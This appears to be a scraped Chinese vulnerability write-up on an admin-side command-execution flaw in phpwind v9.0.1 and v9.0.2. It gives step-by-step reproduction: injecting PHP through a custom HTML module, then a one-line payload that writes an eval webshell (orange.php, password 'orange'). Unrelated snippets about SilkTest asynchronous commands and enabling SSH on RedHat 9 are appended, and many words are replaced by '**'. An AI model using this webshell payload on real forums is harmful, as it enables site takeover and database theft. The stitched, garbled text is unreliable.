已知漏洞:
phpwind v9最新版存在命令執行漏洞(登陸後台)
phpwind_v9.0.2(最新版
),phpwind_v9.0.1
命令執行
高危(getshell)
phpwind是乙個基於php和mysql的開源社群程式,是國內最受歡迎的通用型論壇程式之一。社群可提供豐富的應用,滿足人們獲取資訊、交流、娛樂、消費等生活需求。phpwind_v9.0.2(最新版
),phpwind_v9.0.1
版本登陸後台,呼叫**,存在命令執行漏洞,進而
getshell
。攻擊者可獲取**社群的資料庫資訊,可發布資訊等。
漏洞驗證
版本phpwind_v9.0.2,登陸後台,門戶
-->
模組管理
-->
呼叫管理
-->
新增模組,新增模組
-->
選擇自定義
html
,下一步,寫入
<?php phpinfo(); ?> ,
然後呼叫**。
選擇呼叫站外**xml,複製連線,訪問,呼叫
xml,
json
都可以。去掉
xml,會執行
phpinfo();
\apicontroller.php,具體**位置如下圖所示
預設安裝,需要登陸後台
1,本地搭建的環境
phpwind_v9.0.2
: 密碼: qrgg
)。實驗用的是
phpwind_v9.0.2
環境,phpwind_v9.0.1
的方法是一樣的
(:
密碼: ydj3)
.htaccess
刪除。2,本地進行實驗,預設安裝,登陸後台(admin.php)(
),門戶
-->
模組管理
-->
呼叫管理
-->
新增模組,新增模組
-->
選擇自定義
html
,下一步,寫入
<?php phpinfo(); ?> ,
然後呼叫**。
3,選擇呼叫站外代,複製連線,訪問,呼叫
xml,
json
都可以。以
xml為例(
去掉xml,會執行
4,將**換成(
<?php fputs(fopen("orange.php","w"),"<?eval(\$_post[orange]);?>");?>
)新建乙個orange.php檔案,將一句話寫入
orange.php
檔案。(
5,(密碼
orange
SilkTest高階高階系列9 非同步執行命令
我們常常會使用sys execute函式執行一些外部的程式或者命令來做一些事情,但是由於sys execute是乙個同步的函式,它會等待執行的命令完成後才會返回。在大多數情況下,這個函式足夠用了。但是在一些特殊的情況下,測試工程師可能期望在執行某個命令的過程中檢查軟體的狀態,以便判斷軟體是否工作正常...
RedHat 9 Linux開啟SSH服務命令
redhat 9 linux開啟ssh服務命令 啟動 service sshd start 安裝過程 1.以root身份登入系統 沒登入系統和沒有足夠的許可權都不能安裝,暈,這不是廢話 2.檢查安裝系統時是否已經安裝ssh服務端軟體包 rpm qa grep openssh 若顯示結果中包含open...
RedHat 9 Linux開啟SSH服務命令
啟動 service sshd start 安裝過程 1.以root身份登入系統 沒登入系統和沒有足夠的許可權都不能安裝,暈,這不是廢話 2.檢查安裝系統時是否已經安裝ssh服務端軟體包 rpm qa grep openssh 若顯示結果中包含openssh server 則說明已經安裝,直接啟動 ...